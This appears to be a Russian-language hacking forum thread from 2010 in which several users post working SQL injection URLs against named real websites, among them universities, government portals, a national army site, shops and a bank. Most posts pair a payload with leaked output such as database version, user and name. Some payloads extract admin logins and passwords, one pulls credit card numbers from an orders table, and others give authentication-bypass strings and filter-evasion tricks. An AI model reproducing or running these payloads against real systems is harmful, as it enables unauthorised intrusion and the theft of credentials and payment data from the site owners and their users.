http://www.noisehead.com/artist/nh_artist.php?artist_id=1+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Ver sion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7 873716C696E6A656E64),0x71),0x71),2--
Database Version: 5.0.77-log
Database name: nhGeek
User name: nhGeek@localhost
Code:
http://www.edbydesign.com/storyteller-page.php?ID=100-99.9+UNION+SELECT+CONCAT(0x7873716C696E6A626567696 E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User( ),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11--
Database Version: 5.0.83-community
Database name: edbydesign
User name: ebd@localhost
skills.library.leeds.ac.uk
PR 6
Code:
http://skills.library.leeds.ac.uk/transcript.php?ID=-17+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5--
shoppingtoursshanghai.com
PR 4
Code:
http://shoppingtoursshanghai.com/page.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30--
auth_root
09.11.2010, 01:00
http://www.dealbert.net/deal.php?id=2865143)+union+select+1,2,version(),4, 5,6,7,8,9,10,11--+
шоп ноуты
версия 5.0.77
http://www.kharkov.net/internet.php3?categ=2+union+select+1,2,concat%28us er%28%29,0x3a,database%28%29,0x3a,version%28%29%29 ,4,5,6,7,8--
P.S. Вывод внизу в 17 строчке...
PR 3 ТиЦ 60 Alexa 1,191,694
http://www.kingdomready.org/humor.php?id=-36+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7--
nemaniak
10.11.2010, 00:11
Сайт китайского квартала LA
chinatownla.com PR-5
Code:
http://www.chinatownla.com/news.php?newsId=46-999.9+union+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5+--+
Code:
5.0.77:4470_user1517178@bh-usage.bluehalo.myregisteredsite.com:4470_chinatown lacom
Сайт Армии Шри Ланки
www.army.lk
Code:
http://www.army.lk/detailed.php?NewsId=495-999.9+union+select+1,concat_ws%280x3a,version%28%2 9,user%28%29,database%28%29%29,3,4,5,6,7,8+--+
Code:
5.0.77:sla_db@localhost:sla
шоп
Code:
http://www.allanhouser.com/eventsDetail.php?id=9-999.9+union+select+1,2,3,4,group_concat(0x0b,table _name),6,7,8,9,10,11+from+information_schema.table s--
Пара скулей
http://www.prof-nastill.ru/result.php?dealer=1&city_id=1+union+select+concat(user(),0x3a,database (),0x3a,version())--
ruprom@localhost:ruprom_ruprom:5.0.91-community
ТиЦ 10 PR 1
http://www.center-prestige.ru/catalogue/preview/?section=-1+union+select+concat(user(),0x3a,database(),0x3a, version())--
newcenterpr1@localhost:db_newcenterpr1:5.0.67-community
ТиЦ 120
moodoone
11.11.2010, 01:54
Code:
http://mosbeer.com.ua/index.php?page=-8+union+select+1,2,3,4,concat_Ws%280x3a,login,pass %29,6,7,8,9,10+from+admin--+
P.S. /admin
DeepBlue7
11.11.2010, 02:15
Code:
http://l2.gtuner.lv/?page=stats&serv=3+union+select+1,2,concat_ws(0x2f,login,passw ord),4,5,6,7,8,9,10,11,12,13,14+from+web_register_ tempusers+limit+1,1--
Version : 5.1.49-log
Database : web335db5
User : web335u5@localhost
http://forum.ampirk.ru/misc.php?sub=memberlist&filter=ad&searchuser=1&custom=1&qorder=and+1=2+union++select+1,concat%28username,c har%2858%29,pass%29,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27+from+amp_for um_users--
http://asiaatnite.com/forum/misc.php?sub=memberlist&filter=ad&searchuser=1&custom=1&qorder=and+1=2+union+select+1,concat%28user%28%29, 0x3a,version%28%29,0x3a,database%28%29%29,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26--
http://www.ashlyninstruments.com/products.php?prodid=-31+union+select+1,concat%28user%28%29,0x3a,databas e%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32--
http://www.dealbert.net/deal.php?id=2865143)+union+select+1,2,UNHEX(HEX(co ncat_ws(nickname,0x3a,realname,0x3a,password))),4, 5,6,7,8,9,10,11+from+users+--+
to.Index
11.11.2010, 15:55
http://www.jubilee-centre.org/topics.php?topicID=convert(int,(CHAR(95)%2BCHAR(33 )%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2B CHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCH AR(97)))
тИЦ 10
Google PageRank 5
tits 70
«Всё видно!» — Всё о нашем зрении: очки, контактные линзы, оправы, оптика
HTML:
http://vsevidno.ru/articles.html?article=-1+union+select+1,2,group_concat(login SEPARATOR 0x3a),group_concat(PASSWORD SEPARATOR 0x3a),5,6,7,8,9+from+vsevidno.kernel_users+--+
4 юзверя
http://www.renwu-house.gov.tw/en/style/front001/bexfront.php?sid=316526172';select+cast(usename||c hr(58)||passwd as int),null,null,null,null,null,null,null+from+pg_sh adow--
http://www.tianliao-house.gov.tw/style/front001/bexfront.php?sid=316526172';select+cast(usename||c hr(58)||passwd as int),null,null,null,null,null,null,null+from+pg_sh adow--
http://www.alepe.pe.gov.br/paginas/?id=3525+and+1=(select+cast(usename||chr(58)||pass wd+as+int)+from+pg_shadow+limit+1+offset+1)
http://gov.boynecity.com/government.phtml?catid=330+and+1=version()::int
http://www.strvisa.com/?pg=5+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11 ,UNHEX(HEX(concat_ws(Login,0x3a,Password))),13,14, 15,16,17,18+from+str_admins+--+
DeepBlue7
13.11.2010, 15:39
Code:
http://benedict.ru/news/news.php?news_id=1337+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,table_name,14,15,16,17,18,19+from+info rmation_schema.tables+where+table_schema=database( )+limit+1,1--
user/version/db :
benedict_1@localhost/5.1.41/benedict_1
###
heks, сильно уж похоже на копи-паст запроса SqlIHelper 2.7. Становимся все ленивее и ленивее .
http://www.rusbulat.ru/vopros.php?vid=6+and+1=0+UnIon+selECt+1,UNHEX(HEX( concat_ws(login,0x3a,pass))),3,4+from+admin+--+
http://www.khlebprod.ru/hoz2.php?vid=6+and+1=0+union+select+1,2,UNHEX(HEX( group_concat(table_name))),4,5+from+INFORMATION_SC HEMA.COLUMNS+where+Table_name=0x757365727175657374 +--+
Code:
http://www.homeopath.ru/index.php?action=pages&id=8+UNION+SELECT+1,2,concat_ws(0x3a,database(),us er(),version()),4,5,6,7--
http://www.fortresspersonal.com/picture.php?id=88609756518+union+select+1,2,concat _ws(0x3a,version(),user(),database()),4,5,6,7,8,9, 10,11,12--
version:5.0.32-Debian_7etch5~bpo31+1-log
usergw10_fortress@supremecenter31.com
databasegw10_fortress
Интернет магазин "Суши Дома"
HTML:
http://sushidoma.net/catalog/ajax_order.php?id=-1+union+select+concat_ws(0x3a,id,last_name,first_n ame,middle_name,login,password,email,phone,address ),2,3+from+users+limit+0,1+--+&number=1
результат смотрим в корзине.
http://www.fsts.ac.ma/fsts/listeannuaires.php?idrubrique=-11+and+1=2+union+select+1,concat(@@version,0x20,us er(),database(),0x20,@@version_compile_os),3,4,5,6 ,7,8,9,10,11,12--
5.1.47 root@localhostouahainf_fsts redhat-linux-gnu
http://www.coralclubes.com/informacion_general.php?id=02+and+1=0+union+select +1,group_concat(username,char(58),password),3,4,5, 6,7+from+admin_usuarios
http://www.maranathafc.tg/template.php?page=detail_infos&id=432+and+1=2+union+select+1,group_concat(login,c har(58),password),3,4,5,6+from+user
http://www.eortologio.gr/data/bios.php/?id=614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16+from+msysaccessobjects
http://wellunic.hu/content.php?id=19;select+version()::int,2+from+pg_ user--
http://elizabethnardo.hu/index.php?mode=menyasszony_hirek&cikk_id=95+and+1=0+union+select+1,2,3,concat_ws(0x 3a,h_name,h_passw),5,6,7,8+from+hirlevel
http://rugs.hu/?pg=product&id=1469'+or+(1,1)=(select+count(0),concat((select+ concat(substring(nick,1,64),char(58),substring(pas s,1,64))+from+admin+limit+0,1),floor(rand(0)*2))fr om(information_schema.tables)+group+by+2)--+
http://letoltokozpont.hu/letoltes_programok_reszletes.php?a=2546+or+(1,1)=( select+count(0),concat((select+version()+from+info rmation_schema.tables+limit+0,1),floor(rand(0)*2)) from(information_schema.tables)+group+by+2)--+%20&k=11
------------------------
SQLite
http://www.citytv.hu/musor_reszletezo.php?fk=17&mk=833&ms=1600&dt=20101114+union+select+sqlite_version()-- (вывода нет, так как одна калонка,и его не видать)
обход авторизации форума
http://www.citytv.hu/musor_reszletezo.php
username - admin' or 1=1--
password - любой пасс
JohnnyBGoode
14.11.2010, 21:19
http://www.foto2web.ru/category-views.php?cat_id_name=6+union+select+1,2,3,4,5,con cat_ws(0x3a,version(),database(),user()),7,8,9,10, 11,12,13,14,15,16+--+
5.0.90:foto2web@localhost:foto2web
http://bestin-art.ru/view_desktop.php?cat=15'+and+1=0+union+select+1,2, concat_ws(0x3a,version(),database(),user()),4,5,6, 7,8,9+--+
5.1.36 :bestin@localhost:bestin
moodoone
15.11.2010, 00:50
Code:
http://hottur.org.ua/infrastruktura.php?id=-22+union+select+1,2,concat_ws%280x3a,login,passwor d%29,4+from+auth--
/admin/admin.php
Смотрите портфолио разработчика. Почти все сайты уязвимы
DezMond™
15.11.2010, 19:21
Сборочка
finexshop.ru тИЦ — 10 PR — 4
Code:
http://www.finexshop.ru/isp.php?iid=-121815+union+select+111,database()+--+&page=1&goods=397722
secure.pratt.duke.edu
Code:
http://secure.pratt.duke.edu/pratt_press/web.php?sid=169&iid=-20'+union+select+1,2,3,4,concat_ws(0x3a3a,username ,password),6,7,8,9,10,11+from+10ch.users+--+
transport-industry.com тИЦ — 10 PR — 4
Code:
http://www.transport-industry.com/distributors-ru.html?&L=5&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=63294a3162
durlach.dlrg.de PR — 1
Code:
http://durlach.dlrg.de/gr/verein/termine/termine-detail.html?tx_dlrgterminkalender_pi1%5Baction%5D= read&tx_dlrgterminkalender_pi1%5Btid%5D=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13, 14,15,16+--+&cHash=4ccffcd4fab1dcc4c3bbe3a3882a18d5
songhai.org тИЦ — 10 PR — 5
Code:
http://www.songhai.org/index.php?option=com_content&view=article&id=82+union+select+user(),222,333+--+:commercialisation&catid=60':commercialisation
uniklinik-ulm.de тИЦ — 10 PR — 6
Code:
http://www.uniklinik-ulm.de/service/aktuelles/veranstaltungen/teaser-detailansicht.html?eventid=-441+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26+--+&cHash=6904a6d892
apostolic.edu тИЦ — 10 PR — 3
Code:
http://www.apostolic.edu/download.php?cmd=detail&&startLib=-00000000000000000000000000000000000000000000000030 '+union+select+1,group_concat(table_name),3+from+i nformation_schema.tables+group+by+table_schema+--+&startCat=00000000000000000000000000000000000000000 000000180&fid=0000000000000000000000000000000000000000000000 3007
math.niu.edu тИЦ — 50 PR — 6
Code:
http://www.math.niu.edu/grad/index.php?cmd=detail&id=-480'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,concat_Ws(0x3a3a,uname,pw d,super),24,25,26,27,28+from+inventory.users+--+
mrbunker.ru тИЦ — 40 PR — 4
Code:
http://www.mrbunker.ru/index.php?id=2&nid=-60+UNioN/**/+/**/SElEct+1,2,3,4,5,group_concat(table_name),7,8,9,10 +from+information_schema.tables+--+
samjicorp.co.kr
Code:
http://www.samjicorp.co.kr/bbs/view.html?id=-31521+union+select+1,2,3,version(),5,6,7,8,9,10,11 ,12,13+--+
hgn.de тИЦ — 10 PR — 3
Code:
http://www.hgn.de/index.php?inhalt=Presse&id=-369'+union+select+1,2,3,4,concat_ws(0x3a3a,admin,v orname,nachname,email,passwort)+from+user+--+
pcsoft.de тИЦ — 10 PR — 4
Code:
http://www.pcsoft.de/?id=glossar&L=1&tx_a21glossary%5Buid%5D=63+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24+/*+&tx_a21glossary%5Bback%5D=36&cHash=4f53095717
moodoone
15.11.2010, 23:07
Code:
http://www.autovirag.dp.ua/product_by_kind.php?id=-62+unIon+select+1,2,version%28%29,4--
harpandaltar.com
PR 5
Code:
http://www.harpandaltar.com/interior.php?t=s&i=3&p=26&e=-48+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8--
DeepBlue7
16.11.2010, 03:17
Code:
http://www.quadrantkindercentra.nl/kind.php?id=2+union+select+1,2,3,concat_ws(0x2f,Us erName,UserPass,UserEmail),5,6,7,8,9+from+users+li mit+1,1--
admin_quadrant@localhost/5.1.52-community-log/admin_quadrant
Вывод в заголовке.
=============
Code:
http://www.waltonspianos.com/products/kind.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2f,vers ion(),user(),database())--
5.0.83-log/waltonsp_ianos@boscgi1202.eigbox.net/waltonsp_db
=============
Code:
http://www.gitaristu.ru/bands/name.php?id=4+union+select+concat_ws(0x2f,username ,user_password),2,3,4,5+from+phpbb_users+limit+1,1--
5.1.52/gitaristu@localhost/gitaristu
lee.edu
PR - 6
Code:
http://www.lee.edu/ce/news_descr.asp?ID=-55+union+select+1,concat_ws(0x3a,user(),database() ,version()),3,4,5,6,7,8--
Code:
http://www.novo-med.ru/index.php?id=2+and+1=0+UNION+SELECT+1,concat_ws(0x 3a,database(),user(),version()),3,4,5--
DeepBlue7
19.11.2010, 22:18
Code:
http://www.signal-doroga.ru/produkt_view.php?id=20100+union+select+1,2,3,4,5,c oncat(user(),0x2f,database(),0x2f,version()),7,8,9 ,10--
user:u69347@10.8.0.125
db:u69347
ver:5.0.90-log
http://www.americatravel.ru/index.cfm?pid=116&cid=28+and+1=@@version
http://yahoo.firemoto.ru/bid.php?id=j66010243%27+and+1=@@version--+
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
....
//// http://forum.xaknet.ru/showpost.php?p=37821&postcount=82
Боян
JohnnyBGoode
21.11.2010, 16:44
http://www.truvor.ru/news.php?id_new=91+union+select+1,2,3,4,concat_ws( 0x3a,version(),user(),database()),6,7,8,9
5.0.26-lk-log:truvorru_coffee@localhost:truvorru_coffee
http://www.distromania.com/distro_info.php?distro=620+and+1=(select+first+1+r db$relation_name+from+rdb$relation_fields)--
Firebird
обход авторизации
username - ' or 1=1--
password - любой пасс
http://www.best-tel.ru/page.php?id=-4+UNION%20SELECT%20group_CONCAT%28id,0x3a,login,0x 3a,passw%29,2%20FROM%20users--+
http://www.fermatta.edu.mx/vernoticia.php?idnew=98768+and+1=0+union+select+1, concat(username,char(58),pass),3,4,5,6,7,8,9+from+ users1
http://www.ifodes.edu.mx/index.php?op=34+or+1+group+by+concat(version(),flo or(rand(0)*2))having+min(0)+or+1--
http://eliru.ru/articles.php?action=view&art=37+and+1=0+union+select+1,concat_ws%280x3a,log in,pass%29,3,4,5,6,7,8,9+from+mse_users--
Админка
Code:
http://eliru.ru/admin
moodoone
25.11.2010, 01:04
Code:
http://tk-sevntu.org.ua/articles_view.php?id=-401+union+select+concat_ws%280x3a,login,password%2 9,2,3,4,5+from+adminlist--
DeepBlue7
25.11.2010, 05:35
PR 3
Code:
http://www.latmet.lv/view.php?num=1+and+1=0+union+select+1,2,3,4,5,6,co ncat_ws(0x2f,user(),version(),database())--
latmet@localhost/5.1.36-community-log/ngs
totenkopf
25.11.2010, 13:06
http://www.grotec.co.uk/grotec_hydroponics_help_and_advice.php?helpID=-27+UNION+SELECT+1,2+--+
grotecdb@localhost:5.0.51a-3ubuntu5.8:grotecdb:debian-linux-gnu
Code:
http://www.flop.ru/product.php?id=-73%27+UNION+SELECT+1,group_concat%28column_name%29 ,3,concat_ws%280x3a3a,database%28%29,user%28%29,ve rsion%28%29,@@version_compile_os%29,5,6,7,8+FROM+I NFORMATION_SCHEMA.COLUMNS+where+table_name=char%28 97,117,116,104,114,101,103%29+--+
Code:
http://www.acousticstorm.com/interview.php?id=-73%27+UNION+SELECT+1,2,3,4,5,6,group_concat%28conc at_ws%280x3a3a,username,password,isAdmin%29%29+fro m+users+--+
А
Code:
http://www.meachamrifles.com/page.php?id=-73%27+UNION+SELECT+1,2,3,4,group_concat%28column_n ame%29,6,7+from+information_schema.columns+where+t able_name=%27users%27+--+
http://www.meachamrifles.com/info.php
ТИЦ: 10
PR: 2
/обсуждения в пм =\
p.s. если кто докрутит, отпишитесь интересно жэ
//
meachamrifles - Боян
http://www.hackforums.net/showthread.php?tid=100011
BANK
http://www.bakhtarbank.com/subpage.php?id=-15+/*!UnIoN+SeLeCt*/+group_cOnCaT(tAblE_naMe)+from+information_schema. %60tables%60+WHERE+TabLE_SCHEma=0x626b626b6162756c 5f626b626462--
www.muenchen.de/service/branchenbuch/?s:bid=1262&sid=21179+or(1,2)=(select+count(*),concat((select+ 'asa'+from+information_schema.tables+limit+0,1),0x 3a,floor(rand()*2))+from+information_schema.tables +group+by+2+limit+0,1)--+
5-ка
Немцы ...топовый
http://www.research.ucdavis.edu/iuc/print.cfm?id=iuc,20,1764,1768+and+1=@@version
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86)
Dec 16 2008 19:46:53
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
MastaBass1
27.11.2010, 01:09
Rockstargames!
http://www.rockstargames.com/classics/?id=2+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0 x3a,version(),database(),user()),8,9
Яндекс тИЦ (CY) 650
Google PageRank (PR) 6
Alexa Rank 7,293 +2,380
http://www.artamonovguber.ru/nakaz.php?mo=5+and+1=(select+first+1+distinct+rdb$ relation_name+from+rdb$relations+where+rdb$system_ flag=0)--
BlackSite
28.11.2010, 16:15
http://website.ptmd.nl/website.php?id=15-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11--
Host IP: 85.17.96.210
Web Server: Apache/2
Powered-by: PHP/5.2.14
satana-fu
28.11.2010, 23:39
http://www.unificado.com.br/novo/med/see.php?id=-87+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7+--
http://www.snapcharity.org/content.php?pg=2&gid=462&cont=471+and+1=0+union+select+1,2,3,4,5,6,7,concat _ws(0x3a,login,password),9,10,11,12,13,14,15,16,17 ,18+from+users--
Вот вам нах, вроде не боян. Выводит красиво, но толку мало, сайт какой-то тупой:
http://www.*moker*guide.com/*g/*moker*Guide/popup_ha*h_weed.php?id=-427+UNION+*ELECT+1,2,3,4,5,6,7,ver*ion(),databa*e( ),u*er(),11,12,13,14,15
Меняем * на s и радуемся.
moodoone
29.11.2010, 23:39
Code:
http://www.originalstyle.com.ua/index.php?w=collections2&id=-1+union+select+1,version%28%29--
Code:
http://www.pro-school.com.ua/index.php?w=new&id=-577+union+select+1,2,3,4,5,version%28%29,7+--+
Code:
http://pro-kiev.com.ua/index.php?w=day&id=-511+union+select+1,2,3,version%28%29+--+
http://www.fourcty.org/news.php?id=39+or+(1,1)=(select+count(0),concat((s elect+version()+from+information_schema.tables+lim it+0,1),floor(rand(0)*2))from(information_schema.t ables)+group+by+2)--+&p=7
bloodAngel
30.11.2010, 22:47
Code:
http://www.rusmg.ru/php/contents.php?id=3824+and+substring(version(),1,1)= 5
))) ТИЦ 375
http://www.holybiblesays.org/articles.php?ID=165+and+1=0+union(select+1,2,versi on(),4,5+from+information_schema.`tables`)
-------
http://www.textileinsight.com/articles.php?id=508'+and+1=0+union+select+1,2,3,4, 5,6,7,group_concat(email,0x3a,password),9,10,11,12 +from+users--+
--------
http://www.hackensackriverkeeper.org/Articles.php?ID=123+and+1=0+union+select+1,2,3,4,5 ,6,7,8,version(),10,11
--------
http://real-press.com/articles.php?id=81+and+1=2+union+select+1,2,3,4,5, 6,7,concat(login,char(58),password)+from+users_cp
--------
http://www.gridironstrategies.com/articles.php?id=28+and+1=0+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,group_concat(email,char(58),pas sword),48,49,50,51,52,53,54,55,56,57,58+from+gs_us ers--
-------
http://www.runninginsight.com/articles.php?id=130'++and+1=0+union+select+1,2,3,4 ,5,6,7,group_concat(email,0x3a,password),9,10,11,1 2+from+users--+
nemaniak
01.12.2010, 03:16
www.the-numbers.com PR-4 ТИЦ-50
Code:
http://www.the-numbers.com/interactive/newsStory.php?newsID=-1656+union+select+1,concat_ws%280x3a,version%28%29 ,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18+--+
Code:
5.0.45:thenumbers_main@localhost:thenumbers_main
www.mcc.commnet.edu PR-6
Code:
http://www.mcc.commnet.edu/newsView.php?newsID=-547+union+select+concat_ws%280x3a,version%28%29,us er%28%29,database%28%29%29,2,3,4,5,6,7,8,9,0,11+--+
Code:
4.1.22:macmcc@localhost:mcc
http://opekaweb.ru/news.php?ocd=view&id=18'+or+(1,1)=(select+count(0),concat((select+co ncat(username,0x3a,passwd)+from+members+limit+0,1) ,floor(rand(0)*2))+from+(information_schema.tables )+group+by+2)+--+'
Code:
http://www.diebold-russia.ru/about/index.php?pmenu=1&ac=3&id=-5+UNION+SELECT+1,2,3,4,5,6--
diebold фирма производитель банкоматов.
moodoone
02.12.2010, 16:25
Code:
http://boolean.org.ua/index.php?a=-7+union+select+1,concat_ws%280x3a,username,passwor d%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30+from+jos_users--+
Code:
http://interatletika.cv.ua/product.php?a=10&id_categ=-34+union+select+1,version%28%29,3--
Code:
http://www.r-avto.kiev.ua/view_items.php?catid=-17+union+select+1,version%28%29,3--
http://www.chavarock.com/cine.php?id=-10+/*!union*/+/*!select*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,dat abase%28%29%29,3,4,5,6,7
5.0.91-community:chavaroc_mescali@localhost:chavaroc_mscb log
http://www.mes-surfboards.com/en/accessoires.php?id=10+or+1+group+by+concat(version (),floor(rand(0)*2))having+min(0)+or+1--
http://www.serrelib.gr/cine.php?id=-7%27+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT%28AES_EN CRYPT%28CONCAT_WS%280x3a,Version%28%29,Database%28 %29,User%28%29%29,0x71%29,0x71%29,8--%20+
Database Version: 5.0.18-nt
Database name: serrelibdb
User name: serrelib@localhost
http://www.psp-umd.com/Jeux-Video-Live_503+and+1=0+union+select+1,2,3,4,5,unhex(hex( @@version)),7,8,9,10,11--.html
http://www.899laclasica.com/cine.php?id=-8679+/*!UNION*/+/*!SELECT*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,dat abase%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17--%20+&enviar1=1&xparam=HARRY%20POTTER%20Y%20LAS%20RELIQUIAS%20DE%2 0LA%20MUERTE
5.1.50:cf_usr899laclasi@localhost:comprandofacil_8 99laclasica
http://www.galex-international.de/accessoires.php?id=186+and+1=0+union+select+concat _ws(0x3a,cc_type,cc_owner,cc_number,cc_expires)+fr om+osc_orders+where+cc_expires=0910--
DeepBlue7
02.12.2010, 22:47
PR 3
http://www.arsenicoproducciones.com/cine.php?id=26+and+1=0+union+select+1,2,3,4,5,6,7, 8,concat_ws(0x2f,user(),version(),database()),10,1 1,12,13,14--
sopor_arsenico@localhost/5.0.68/soporte_web
http://en.throttleman.com/clipping.php?id=173%27+UNION+SELECT+1,2,3,concat_w s%280x3a,version%28%29,database%28%29,user%28%29%2 9,5,6,7,8,9,10,11,12,13+limit+1,1--+
5.0.77:mv_mundofunny:mvmfcm@localhost
DeepBlue7
02.12.2010, 22:55
PR 5
http://www.cartelera.com.uy/cine.php?id=45+and+1=0+union+select+1,concat_ws(0x 2f,user(),version(),database()),3--
cartelera@localhost/5.0.48/cartelera
http://chudovomebel.ru/tovar.php?id=-12+union+select+1,2,concat_ws%280x3a,version%28%29 ,database%28%29,user%28%29%29,4,5
5.0.51a-24+lenny2:a12807_chudovo:root@localhost
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot